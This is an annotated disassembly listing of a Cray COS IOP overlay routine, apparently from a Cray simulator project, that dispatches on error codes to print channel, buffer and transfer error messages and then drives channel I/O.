target/cos_117/disasm/iop_overlay1/CONCERR.asm
|
jrrk2/cray-sim
|
52c9639808d6890517092637b188282c00cce4f7
|
[
"BSL-1.0"
] | 6
|
2021-04-12T06:10:32.000Z
|
2022-02-08T23:11:19.000Z
|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ Input:
@@ OR[280]: Error message code (like 80 or 42)
@@ OR[281]: Pointer to some 2k buffer
@@ OR[282]: Stage (1, 2, 3, 4, 5, something like that)
@@ OR[283]: Set to 0
@@
@@ Error codes:
@@ 6 - 'local buffers exhausted'
@@ 41 - 'MOS buffers exhausted'
@@ 42 - 'Cray POLL error'
@@ 43 - 'MOS DALs exhausted'
@@ 44 - stage 2, 3: 'input transfer length error'
@@ 44 - other stages: 'output transfer length error'
@@ 68 - stage 2, 3: 'input channel timeout'
@@ 68 - other stages: 'output channel timeout'
@@ 75 - stage 2, 3: 'input channel error'
@@ 75 - other stages: 'output channel error'
@@ 80 - 'received a bad input LCP'
0x0000 (0x000000) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0001 (0x000002) 0x2926- f:00024 d: 294 | OR[294] = A
0x0002 (0x000004) 0x211B- f:00020 d: 283 | A = OR[283]
0x0003 (0x000006) 0x8402- f:00102 d: 2 | P = P + 2 (0x0005), A = 0
0x0004 (0x000008) 0x7003- f:00070 d: 3 | P = P + 3 (0x0007)
0x0005 (0x00000A) 0x2102- f:00020 d: 258 | A = OR[258]
0x0006 (0x00000C) 0x9730- f:00113 d: 304 | R = P + 304 (0x0136), A # 0
0x0007 (0x00000E) 0x2118- f:00020 d: 280 | A = OR[280]
0x0008 (0x000010) 0x1E00-0x002C f:00017 d: 0 | A = A - 44 (0x002C)
0x000A (0x000014) 0x8402- f:00102 d: 2 | P = P + 2 (0x000C), A = 0
0x000B (0x000016) 0x7014- f:00070 d: 20 | P = P + 20 (0x001F)
@ Error-code 44 parser
0x000C (0x000018) 0x211A- f:00020 d: 282 | A = OR[282]
0x000D (0x00001A) 0x1602- f:00013 d: 2 | A = A - 2 (0x0002)
0x000E (0x00001C) 0x8405- f:00102 d: 5 | P = P + 5 (0x0013), A = 0
0x000F (0x00001E) 0x211A- f:00020 d: 282 | A = OR[282]
0x0010 (0x000020) 0x1603- f:00013 d: 3 | A = A - 3 (0x0003)
0x0011 (0x000022) 0x8402- f:00102 d: 2 | P = P + 2 (0x0013), A = 0
0x0012 (0x000024) 0x7007- f:00070 d: 7 | P = P + 7 (0x0019)
0x0013 (0x000026) 0x1800-0x0269 f:00014 d: 0 | A = 617 (0x0269) @ For Stage 2 or 3, print message: 'input transfer length error'
0x0015 (0x00002A) 0x291C- f:00024 d: 284 | OR[284] = A
0x0016 (0x00002C) 0x100E- f:00010 d: 14 | A = 14 (0x000E)
0x0017 (0x00002E) 0x291E- f:00024 d: 286 | OR[286] = A
0x0018 (0x000030) 0x7006- f:00070 d: 6 | P = P + 6 (0x001E)
0x0019 (0x000032) 0x1800-0x0277 f:00014 d: 0 | A = 631 (0x0277) @ For other stages, print message: 'output transfer length error'
0x001B (0x000036) 0x291C- f:00024 d: 284 | OR[284] = A
0x001C (0x000038) 0x100E- f:00010 d: 14 | A = 14 (0x000E)
0x001D (0x00003A) 0x291E- f:00024 d: 286 | OR[286] = A
0x001E (0x00003C) 0x7071- f:00070 d: 113 | P = P + 113 (0x008F)
0x001F (0x00003E) 0x2118- f:00020 d: 280 | A = OR[280]
0x0020 (0x000040) 0x1E00-0x004B f:00017 d: 0 | A = A - 75 (0x004B)
0x0022 (0x000044) 0x8406- f:00102 d: 6 | P = P + 6 (0x0028), A = 0
0x0023 (0x000046) 0x2118- f:00020 d: 280 | A = OR[280]
0x0024 (0x000048) 0x1E00-0x0044 f:00017 d: 0 | A = A - 68 (0x0044)
0x0026 (0x00004C) 0x8402- f:00102 d: 2 | P = P + 2 (0x0028), A = 0
0x0027 (0x00004E) 0x702C- f:00070 d: 44 | P = P + 44 (0x0053)
0x0028 (0x000050) 0x2118- f:00020 d: 280 | A = OR[280]
0x0029 (0x000052) 0x1E00-0x004B f:00017 d: 0 | A = A - 75 (0x004B)
0x002B (0x000056) 0x8402- f:00102 d: 2 | P = P + 2 (0x002D), A = 0
0x002C (0x000058) 0x7014- f:00070 d: 20 | P = P + 20 (0x0040)
@ Error-code 75 handler
0x002D (0x00005A) 0x211A- f:00020 d: 282 | A = OR[282]
0x002E (0x00005C) 0x1602- f:00013 d: 2 | A = A - 2 (0x0002)
0x002F (0x00005E) 0x8405- f:00102 d: 5 | P = P + 5 (0x0034), A = 0
0x0030 (0x000060) 0x211A- f:00020 d: 282 | A = OR[282]
0x0031 (0x000062) 0x1603- f:00013 d: 3 | A = A - 3 (0x0003)
0x0032 (0x000064) 0x8402- f:00102 d: 2 | P = P + 2 (0x0034), A = 0
0x0033 (0x000066) 0x7007- f:00070 d: 7 | P = P + 7 (0x003A)
0x0034 (0x000068) 0x1800-0x0207 f:00014 d: 0 | A = 519 (0x0207) @ For stage 2 or 3, print message: 'input channel error'
0x0036 (0x00006C) 0x291C- f:00024 d: 284 | OR[284] = A
0x0037 (0x00006E) 0x100A- f:00010 d: 10 | A = 10 (0x000A)
0x0038 (0x000070) 0x291E- f:00024 d: 286 | OR[286] = A
0x0039 (0x000072) 0x7006- f:00070 d: 6 | P = P + 6 (0x003F)
0x003A (0x000074) 0x1800-0x0211 f:00014 d: 0 | A = 529 (0x0211) @ For other stages, print message: 'output channel error'
0x003C (0x000078) 0x291C- f:00024 d: 284 | OR[284] = A
0x003D (0x00007A) 0x100A- f:00010 d: 10 | A = 10 (0x000A)
0x003E (0x00007C) 0x291E- f:00024 d: 286 | OR[286] = A
0x003F (0x00007E) 0x7013- f:00070 d: 19 | P = P + 19 (0x0052)
@ Error code 68 handler
0x0040 (0x000080) 0x211A- f:00020 d: 282 | A = OR[282]
0x0041 (0x000082) 0x1602- f:00013 d: 2 | A = A - 2 (0x0002)
0x0042 (0x000084) 0x8405- f:00102 d: 5 | P = P + 5 (0x0047), A = 0
0x0043 (0x000086) 0x211A- f:00020 d: 282 | A = OR[282]
0x0044 (0x000088) 0x1603- f:00013 d: 3 | A = A - 3 (0x0003)
0x0045 (0x00008A) 0x8402- f:00102 d: 2 | P = P + 2 (0x0047), A = 0
0x0046 (0x00008C) 0x7007- f:00070 d: 7 | P = P + 7 (0x004D)
0x0047 (0x00008E) 0x1800-0x021C f:00014 d: 0 | A = 540 (0x021C) @ For stage 2 or 3, print message: 'input channel timeout'
0x0049 (0x000092) 0x291C- f:00024 d: 284 | OR[284] = A
0x004A (0x000094) 0x100B- f:00010 d: 11 | A = 11 (0x000B)
0x004B (0x000096) 0x291E- f:00024 d: 286 | OR[286] = A
0x004C (0x000098) 0x7006- f:00070 d: 6 | P = P + 6 (0x0052)
0x004D (0x00009A) 0x1800-0x0227 f:00014 d: 0 | A = 551 (0x0227) @ For other stages, print message: 'output channel timeout'
0x004F (0x00009E) 0x291C- f:00024 d: 284 | OR[284] = A
0x0050 (0x0000A0) 0x100B- f:00010 d: 11 | A = 11 (0x000B)
0x0051 (0x0000A2) 0x291E- f:00024 d: 286 | OR[286] = A
0x0052 (0x0000A4) 0x703D- f:00070 d: 61 | P = P + 61 (0x008F)
@ Error code 80 handler
0x0053 (0x0000A6) 0x2118- f:00020 d: 280 | A = OR[280]
0x0054 (0x0000A8) 0x1E00-0x0050 f:00017 d: 0 | A = A - 80 (0x0050)
0x0056 (0x0000AC) 0x8402- f:00102 d: 2 | P = P + 2 (0x0058), A = 0
0x0057 (0x0000AE) 0x7007- f:00070 d: 7 | P = P + 7 (0x005E)
0x0058 (0x0000B0) 0x1800-0x0233 f:00014 d: 0 | A = 563 (0x0233) @ print message: 'received a bad input LCP'
0x005A (0x0000B4) 0x291C- f:00024 d: 284 | OR[284] = A
0x005B (0x0000B6) 0x100C- f:00010 d: 12 | A = 12 (0x000C)
0x005C (0x0000B8) 0x291E- f:00024 d: 286 | OR[286] = A
0x005D (0x0000BA) 0x7032- f:00070 d: 50 | P = P + 50 (0x008F)
@ Error-code 41 handler
0x005E (0x0000BC) 0x2118- f:00020 d: 280 | A = OR[280]
0x005F (0x0000BE) 0x1E00-0x0029 f:00017 d: 0 | A = A - 41 (0x0029)
0x0061 (0x0000C2) 0x8402- f:00102 d: 2 | P = P + 2 (0x0063), A = 0
0x0062 (0x0000C4) 0x7007- f:00070 d: 7 | P = P + 7 (0x0069)
0x0063 (0x0000C6) 0x1800-0x0240 f:00014 d: 0 | A = 576 (0x0240) @ print message: 'MOS buffers exhausted'
0x0065 (0x0000CA) 0x291C- f:00024 d: 284 | OR[284] = A
0x0066 (0x0000CC) 0x100B- f:00010 d: 11 | A = 11 (0x000B)
0x0067 (0x0000CE) 0x291E- f:00024 d: 286 | OR[286] = A
0x0068 (0x0000D0) 0x7027- f:00070 d: 39 | P = P + 39 (0x008F)
@ Error-code 6 handler
0x0069 (0x0000D2) 0x2118- f:00020 d: 280 | A = OR[280]
0x006A (0x0000D4) 0x1E00-0x0006 f:00017 d: 0 | A = A - 6 (0x0006)
0x006C (0x0000D8) 0x8402- f:00102 d: 2 | P = P + 2 (0x006E), A = 0
0x006D (0x0000DA) 0x7007- f:00070 d: 7 | P = P + 7 (0x0074)
0x006E (0x0000DC) 0x1800-0x024B f:00014 d: 0 | A = 587 (0x024B) @ print message: 'local buffers exhausted'
0x0070 (0x0000E0) 0x291C- f:00024 d: 284 | OR[284] = A
0x0071 (0x0000E2) 0x100C- f:00010 d: 12 | A = 12 (0x000C)
0x0072 (0x0000E4) 0x291E- f:00024 d: 286 | OR[286] = A
0x0073 (0x0000E6) 0x701C- f:00070 d: 28 | P = P + 28 (0x008F)
@ Error-code 43 handler
0x0074 (0x0000E8) 0x2118- f:00020 d: 280 | A = OR[280]
0x0075 (0x0000EA) 0x1E00-0x002B f:00017 d: 0 | A = A - 43 (0x002B)
0x0077 (0x0000EE) 0x8402- f:00102 d: 2 | P = P + 2 (0x0079), A = 0
0x0078 (0x0000F0) 0x7007- f:00070 d: 7 | P = P + 7 (0x007F)
0x0079 (0x0000F2) 0x1800-0x0257 f:00014 d: 0 | A = 599 (0x0257) @ print message: 'MOS DALs exhausted'
0x007B (0x0000F6) 0x291C- f:00024 d: 284 | OR[284] = A
0x007C (0x0000F8) 0x100A- f:00010 d: 10 | A = 10 (0x000A)
0x007D (0x0000FA) 0x291E- f:00024 d: 286 | OR[286] = A
0x007E (0x0000FC) 0x7011- f:00070 d: 17 | P = P + 17 (0x008F)
@ Error-code 42 handler
0x007F (0x0000FE) 0x2118- f:00020 d: 280 | A = OR[280]
0x0080 (0x000100) 0x1E00-0x002A f:00017 d: 0 | A = A - 42 (0x002A)
0x0082 (0x000104) 0x8402- f:00102 d: 2 | P = P + 2 (0x0084), A = 0
0x0083 (0x000106) 0x7007- f:00070 d: 7 | P = P + 7 (0x008A)
0x0084 (0x000108) 0x1800-0x0261 f:00014 d: 0 | A = 609 (0x0261) @ print message: 'Cray POLL error'
0x0086 (0x00010C) 0x291C- f:00024 d: 284 | OR[284] = A
0x0087 (0x00010E) 0x1008- f:00010 d: 8 | A = 8 (0x0008)
0x0088 (0x000110) 0x291E- f:00024 d: 286 | OR[286] = A
0x0089 (0x000112) 0x7006- f:00070 d: 6 | P = P + 6 (0x008F)
@ Invalid error-code handler
0x008A (0x000114) 0x1800-0x0294 f:00014 d: 0 | A = 660 (0x0294) @ print message: 'Unknown error condition'
0x008C (0x000118) 0x291C- f:00024 d: 284 | OR[284] = A
0x008D (0x00011A) 0x100C- f:00010 d: 12 | A = 12 (0x000C)
0x008E (0x00011C) 0x291E- f:00024 d: 286 | OR[286] = A
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ Print message
@@ OR[284]: message offset
@@ OR[286]: message length
0x008F (0x00011E) 0x1018- f:00010 d: 24 | A = 24 (0x0018)
0x0090 (0x000120) 0x2928- f:00024 d: 296 | OR[296] = A
0x0091 (0x000122) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0092 (0x000124) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x0093 (0x000126) 0x2929- f:00024 d: 297 | OR[297] = A
0x0094 (0x000128) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0095 (0x00012A) 0x292A- f:00024 d: 298 | OR[298] = A
0x0096 (0x00012C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0097 (0x00012E) 0x292B- f:00024 d: 299 | OR[299] = A
0x0098 (0x000130) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0099 (0x000132) 0x292C- f:00024 d: 300 | OR[300] = A
0x009A (0x000134) 0x111D- f:00010 d: 285 | A = 285 (0x011D)
0x009B (0x000136) 0x292D- f:00024 d: 301 | OR[301] = A
0x009C (0x000138) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x009D (0x00013A) 0x5800- f:00054 d: 0 | B = A
0x009E (0x00013C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x009F (0x00013E) 0x7C09- f:00076 d: 9 | R = OR[9]
0x00A0 (0x000140) 0x8690- f:00103 d: 144 | P = P + 144 (0x0130), A # 0
0x00A1 (0x000142) 0x211D- f:00020 d: 285 | A = OR[285]
0x00A2 (0x000144) 0x1428- f:00012 d: 40 | A = A + 40 (0x0028)
0x00A3 (0x000146) 0x2920- f:00024 d: 288 | OR[288] = A
0x00A4 (0x000148) 0x211D- f:00020 d: 285 | A = OR[285]
0x00A5 (0x00014A) 0x290E- f:00024 d: 270 | OR[270] = A
0x00A6 (0x00014C) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x00A7 (0x00014E) 0x290D- f:00024 d: 269 | OR[269] = A
0x00A8 (0x000150) 0x210D- f:00020 d: 269 | A = OR[269]
0x00A9 (0x000152) 0x8407- f:00102 d: 7 | P = P + 7 (0x00B0), A = 0
0x00AA (0x000154) 0x1800-0x2020 f:00014 d: 0 | A = 8224 (0x2020)
0x00AC (0x000158) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x00AD (0x00015A) 0x2F0D- f:00027 d: 269 | OR[269] = OR[269] - 1
0x00AE (0x00015C) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x00AF (0x00015E) 0x7207- f:00071 d: 7 | P = P - 7 (0x00A8)
0x00B0 (0x000160) 0x1800-0x01FC f:00014 d: 0 | A = 508 (0x01FC)
0x00B2 (0x000164) 0x2403- f:00022 d: 3 | A = A + OR[3]
0x00B3 (0x000166) 0x291F- f:00024 d: 287 | OR[287] = A
0x00B4 (0x000168) 0x211F- f:00020 d: 287 | A = OR[287]
0x00B5 (0x00016A) 0x290D- f:00024 d: 269 | OR[269] = A
0x00B6 (0x00016C) 0x211D- f:00020 d: 285 | A = OR[285]
0x00B7 (0x00016E) 0x290E- f:00024 d: 270 | OR[270] = A
0x00B8 (0x000170) 0x100A- f:00010 d: 10 | A = 10 (0x000A)
0x00B9 (0x000172) 0x290F- f:00024 d: 271 | OR[271] = A
0x00BA (0x000174) 0x7006- f:00070 d: 6 | P = P + 6 (0x00C0)
0x00BB (0x000176) 0x310D- f:00030 d: 269 | A = (OR[269])
0x00BC (0x000178) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x00BD (0x00017A) 0x2D0D- f:00026 d: 269 | OR[269] = OR[269] + 1
0x00BE (0x00017C) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x00BF (0x00017E) 0x2F0F- f:00027 d: 271 | OR[271] = OR[271] - 1
0x00C0 (0x000180) 0x210F- f:00020 d: 271 | A = OR[271]
0x00C1 (0x000182) 0x8E06- f:00107 d: 6 | P = P - 6 (0x00BB), A # 0
0x00C2 (0x000184) 0x2103- f:00020 d: 259 | A = OR[259]
0x00C3 (0x000186) 0x3920- f:00034 d: 288 | (OR[288]) = A
0x00C4 (0x000188) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x00C5 (0x00018A) 0x2928- f:00024 d: 296 | OR[296] = A
0x00C6 (0x00018C) 0x1800-0x000F f:00014 d: 0 | A = 15 (0x000F)
0x00C8 (0x000190) 0x2929- f:00024 d: 297 | OR[297] = A
0x00C9 (0x000192) 0x2120- f:00020 d: 288 | A = OR[288]
0x00CA (0x000194) 0x292A- f:00024 d: 298 | OR[298] = A
0x00CB (0x000196) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00CC (0x000198) 0x292B- f:00024 d: 299 | OR[299] = A
0x00CD (0x00019A) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x00CE (0x00019C) 0x292C- f:00024 d: 300 | OR[300] = A
0x00CF (0x00019E) 0x211D- f:00020 d: 285 | A = OR[285]
0x00D0 (0x0001A0) 0x292D- f:00024 d: 301 | OR[301] = A
0x00D1 (0x0001A2) 0x1016- f:00010 d: 22 | A = 22 (0x0016)
0x00D2 (0x0001A4) 0x292E- f:00024 d: 302 | OR[302] = A
0x00D3 (0x0001A6) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00D4 (0x0001A8) 0x292F- f:00024 d: 303 | OR[303] = A
0x00D5 (0x0001AA) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x00D6 (0x0001AC) 0x5800- f:00054 d: 0 | B = A
0x00D7 (0x0001AE) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x00D9 (0x0001B2) 0x7C09- f:00076 d: 9 | R = OR[9]
0x00DA (0x0001B4) 0x211D- f:00020 d: 285 | A = OR[285]
0x00DB (0x0001B6) 0x140A- f:00012 d: 10 | A = A + 10 (0x000A)
0x00DC (0x0001B8) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x00DD (0x0001BA) 0x2923- f:00024 d: 291 | OR[291] = A
0x00DE (0x0001BC) 0x211C- f:00020 d: 284 | A = OR[284]
0x00DF (0x0001BE) 0x2403- f:00022 d: 3 | A = A + OR[3]
0x00E0 (0x0001C0) 0x291C- f:00024 d: 284 | OR[284] = A
0x00E1 (0x0001C2) 0x211C- f:00020 d: 284 | A = OR[284]
0x00E2 (0x0001C4) 0x290D- f:00024 d: 269 | OR[269] = A
0x00E3 (0x0001C6) 0x2123- f:00020 d: 291 | A = OR[291]
0x00E4 (0x0001C8) 0x290E- f:00024 d: 270 | OR[270] = A
0x00E5 (0x0001CA) 0x211E- f:00020 d: 286 | A = OR[286]
0x00E6 (0x0001CC) 0x290F- f:00024 d: 271 | OR[271] = A
0x00E7 (0x0001CE) 0x7006- f:00070 d: 6 | P = P + 6 (0x00ED)
0x00E8 (0x0001D0) 0x310D- f:00030 d: 269 | A = (OR[269])
0x00E9 (0x0001D2) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x00EA (0x0001D4) 0x2D0D- f:00026 d: 269 | OR[269] = OR[269] + 1
0x00EB (0x0001D6) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x00EC (0x0001D8) 0x2F0F- f:00027 d: 271 | OR[271] = OR[271] - 1
0x00ED (0x0001DA) 0x210F- f:00020 d: 271 | A = OR[271]
0x00EE (0x0001DC) 0x8E06- f:00107 d: 6 | P = P - 6 (0x00E8), A # 0
0x00EF (0x0001DE) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x00F0 (0x0001E0) 0x2928- f:00024 d: 296 | OR[296] = A
0x00F1 (0x0001E2) 0x211D- f:00020 d: 285 | A = OR[285]
0x00F2 (0x0001E4) 0x2929- f:00024 d: 297 | OR[297] = A
0x00F3 (0x0001E6) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x00F4 (0x0001E8) 0x5800- f:00054 d: 0 | B = A
0x00F5 (0x0001EA) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x00F7 (0x0001EE) 0x7C09- f:00076 d: 9 | R = OR[9]
0x00F8 (0x0001F0) 0x2126- f:00020 d: 294 | A = OR[294]
0x00F9 (0x0001F2) 0x8602- f:00103 d: 2 | P = P + 2 (0x00FB), A # 0
0x00FA (0x0001F4) 0x702E- f:00070 d: 46 | P = P + 46 (0x0128)
0x00FB (0x0001F6) 0x211D- f:00020 d: 285 | A = OR[285]
0x00FC (0x0001F8) 0x140A- f:00012 d: 10 | A = A + 10 (0x000A)
0x00FD (0x0001FA) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x00FE (0x0001FC) 0x290E- f:00024 d: 270 | OR[270] = A
0x00FF (0x0001FE) 0x211E- f:00020 d: 286 | A = OR[286]
0x0100 (0x000200) 0x290D- f:00024 d: 269 | OR[269] = A
0x0101 (0x000202) 0x210D- f:00020 d: 269 | A = OR[269]
0x0102 (0x000204) 0x8407- f:00102 d: 7 | P = P + 7 (0x0109), A = 0
0x0103 (0x000206) 0x1800-0x2020 f:00014 d: 0 | A = 8224 (0x2020)
0x0105 (0x00020A) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x0106 (0x00020C) 0x2F0D- f:00027 d: 269 | OR[269] = OR[269] - 1
0x0107 (0x00020E) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x0108 (0x000210) 0x7207- f:00071 d: 7 | P = P - 7 (0x0101)
0x0109 (0x000212) 0x2003- f:00020 d: 3 | A = OR[3]
0x010A (0x000214) 0x1C00-0x0286 f:00016 d: 0 | A = A + 646 (0x0286)
0x010C (0x000218) 0x291C- f:00024 d: 284 | OR[284] = A
0x010D (0x00021A) 0x211D- f:00020 d: 285 | A = OR[285]
0x010E (0x00021C) 0x140A- f:00012 d: 10 | A = A + 10 (0x000A)
0x010F (0x00021E) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x0110 (0x000220) 0x2923- f:00024 d: 291 | OR[291] = A
0x0111 (0x000222) 0x211C- f:00020 d: 284 | A = OR[284]
0x0112 (0x000224) 0x290D- f:00024 d: 269 | OR[269] = A
0x0113 (0x000226) 0x2123- f:00020 d: 291 | A = OR[291]
0x0114 (0x000228) 0x290E- f:00024 d: 270 | OR[270] = A
0x0115 (0x00022A) 0x100D- f:00010 d: 13 | A = 13 (0x000D)
0x0116 (0x00022C) 0x290F- f:00024 d: 271 | OR[271] = A
0x0117 (0x00022E) 0x7006- f:00070 d: 6 | P = P + 6 (0x011D)
0x0118 (0x000230) 0x310D- f:00030 d: 269 | A = (OR[269])
0x0119 (0x000232) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x011A (0x000234) 0x2D0D- f:00026 d: 269 | OR[269] = OR[269] + 1
0x011B (0x000236) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x011C (0x000238) 0x2F0F- f:00027 d: 271 | OR[271] = OR[271] - 1
0x011D (0x00023A) 0x210F- f:00020 d: 271 | A = OR[271]
0x011E (0x00023C) 0x8E06- f:00107 d: 6 | P = P - 6 (0x0118), A # 0
0x011F (0x00023E) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x0120 (0x000240) 0x2928- f:00024 d: 296 | OR[296] = A
0x0121 (0x000242) 0x211D- f:00020 d: 285 | A = OR[285]
0x0122 (0x000244) 0x2929- f:00024 d: 297 | OR[297] = A
0x0123 (0x000246) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0124 (0x000248) 0x5800- f:00054 d: 0 | B = A
0x0125 (0x00024A) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0127 (0x00024E) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0128 (0x000250) 0x1019- f:00010 d: 25 | A = 25 (0x0019)
0x0129 (0x000252) 0x2928- f:00024 d: 296 | OR[296] = A
0x012A (0x000254) 0x211D- f:00020 d: 285 | A = OR[285]
0x012B (0x000256) 0x2929- f:00024 d: 297 | OR[297] = A
0x012C (0x000258) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x012D (0x00025A) 0x5800- f:00054 d: 0 | B = A
0x012E (0x00025C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x012F (0x00025E) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0130 (0x000260) 0x102A- f:00010 d: 42 | A = 42 (0x002A)
0x0131 (0x000262) 0x2928- f:00024 d: 296 | OR[296] = A
0x0132 (0x000264) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0133 (0x000266) 0x5800- f:00054 d: 0 | B = A
0x0134 (0x000268) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0135 (0x00026A) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0136 (0x00026C) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0137 (0x00026E) 0x2923- f:00024 d: 291 | OR[291] = A
0x0138 (0x000270) 0x2100- f:00020 d: 256 | A = OR[256]
0x0139 (0x000272) 0x143F- f:00012 d: 63 | A = A + 63 (0x003F)
0x013A (0x000274) 0x2922- f:00024 d: 290 | OR[290] = A
0x013B (0x000276) 0x2119- f:00020 d: 281 | A = OR[281]
0x013C (0x000278) 0x8402- f:00102 d: 2 | P = P + 2 (0x013E), A = 0
0x013D (0x00027A) 0x700D- f:00070 d: 13 | P = P + 13 (0x014A)
0x013E (0x00027C) 0x101A- f:00010 d: 26 | A = 26 (0x001A)
0x013F (0x00027E) 0x2928- f:00024 d: 296 | OR[296] = A
0x0140 (0x000280) 0x1121- f:00010 d: 289 | A = 289 (0x0121)
0x0141 (0x000282) 0x2929- f:00024 d: 297 | OR[297] = A
0x0142 (0x000284) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0143 (0x000286) 0x5800- f:00054 d: 0 | B = A
0x0144 (0x000288) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0145 (0x00028A) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0146 (0x00028C) 0x8403- f:00102 d: 3 | P = P + 3 (0x0149), A = 0
0x0147 (0x00028E) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0148 (0x000290) 0x2923- f:00024 d: 291 | OR[291] = A
0x0149 (0x000292) 0x7003- f:00070 d: 3 | P = P + 3 (0x014C)
0x014A (0x000294) 0x2119- f:00020 d: 281 | A = OR[281]
0x014B (0x000296) 0x2921- f:00024 d: 289 | OR[289] = A
0x014C (0x000298) 0x2123- f:00020 d: 291 | A = OR[291]
0x014D (0x00029A) 0x841F- f:00102 d: 31 | P = P + 31 (0x016C), A = 0
0x014E (0x00029C) 0x2102- f:00020 d: 258 | A = OR[258]
0x014F (0x00029E) 0x5800- f:00054 d: 0 | B = A
0x0150 (0x0002A0) 0xF200- f:00171 d: 0 | IOB , fn011
0x0151 (0x0002A2) 0x080F- f:00004 d: 15 | A = A > 15 (0x000F)
0x0152 (0x0002A4) 0x2923- f:00024 d: 291 | OR[291] = A
0x0153 (0x0002A6) 0x8602- f:00103 d: 2 | P = P + 2 (0x0155), A # 0
0x0154 (0x0002A8) 0x7017- f:00070 d: 23 | P = P + 23 (0x016B)
0x0155 (0x0002AA) 0xE000- f:00160 d: 0 | IOB , fn000
0x0156 (0x0002AC) 0xEE00- f:00167 d: 0 | IOB , fn007
0x0157 (0x0002AE) 0x1800-0x0800 f:00014 d: 0 | A = 2048 (0x0800)
0x0159 (0x0002B2) 0xE400- f:00162 d: 0 | IOB , fn002
0x015A (0x0002B4) 0x2121- f:00020 d: 289 | A = OR[289]
0x015B (0x0002B6) 0xE200- f:00161 d: 0 | IOB , fn001
0x015C (0x0002B8) 0x0400- f:00002 d: 0 | I = 0
0x015D (0x0002BA) 0x0000- f:00000 d: 0 | PASS
0x015E (0x0002BC) 0x747A- f:00072 d: 122 | R = P + 122 (0x01D8)
0x015F (0x0002BE) 0x0600- f:00003 d: 0 | I = 1
0x0160 (0x0002C0) 0x8606- f:00103 d: 6 | P = P + 6 (0x0166), A # 0
0x0161 (0x0002C2) 0x2124- f:00020 d: 292 | A = OR[292]
0x0162 (0x0002C4) 0x1E00-0xFFF8 f:00017 d: 0 | A = A - 65528 (0xFFF8)
0x0164 (0x0002C8) 0x8602- f:00103 d: 2 | P = P + 2 (0x0166), A # 0
0x0165 (0x0002CA) 0x7006- f:00070 d: 6 | P = P + 6 (0x016B)
0x0166 (0x0002CC) 0x2102- f:00020 d: 258 | A = OR[258]
0x0167 (0x0002CE) 0x5800- f:00054 d: 0 | B = A
0x0168 (0x0002D0) 0xE800- f:00164 d: 0 | IOB , fn004
0x0169 (0x0002D2) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x016A (0x0002D4) 0x2923- f:00024 d: 291 | OR[291] = A
0x016B (0x0002D6) 0x721F- f:00071 d: 31 | P = P - 31 (0x014C)
0x016C (0x0002D8) 0x2102- f:00020 d: 258 | A = OR[258]
0x016D (0x0002DA) 0x5800- f:00054 d: 0 | B = A
0x016E (0x0002DC) 0xE000- f:00160 d: 0 | IOB , fn000
0x016F (0x0002DE) 0xE600- f:00163 d: 0 | IOB , fn003
0x0170 (0x0002E0) 0xEC00- f:00166 d: 0 | IOB , fn006
0x0171 (0x0002E2) 0x2102- f:00020 d: 258 | A = OR[258]
0x0172 (0x0002E4) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x0173 (0x0002E6) 0x5800- f:00054 d: 0 | B = A
0x0174 (0x0002E8) 0xE000- f:00160 d: 0 | IOB , fn000
0x0175 (0x0002EA) 0xE600- f:00163 d: 0 | IOB , fn003
0x0176 (0x0002EC) 0x1800-0x4000 f:00014 d: 0 | A = 16384 (0x4000)
0x0178 (0x0002F0) 0xE800- f:00164 d: 0 | IOB , fn004
0x0179 (0x0002F2) 0x1007- f:00010 d: 7 | A = 7 (0x0007)
0x017A (0x0002F4) 0x2928- f:00024 d: 296 | OR[296] = A
0x017B (0x0002F6) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
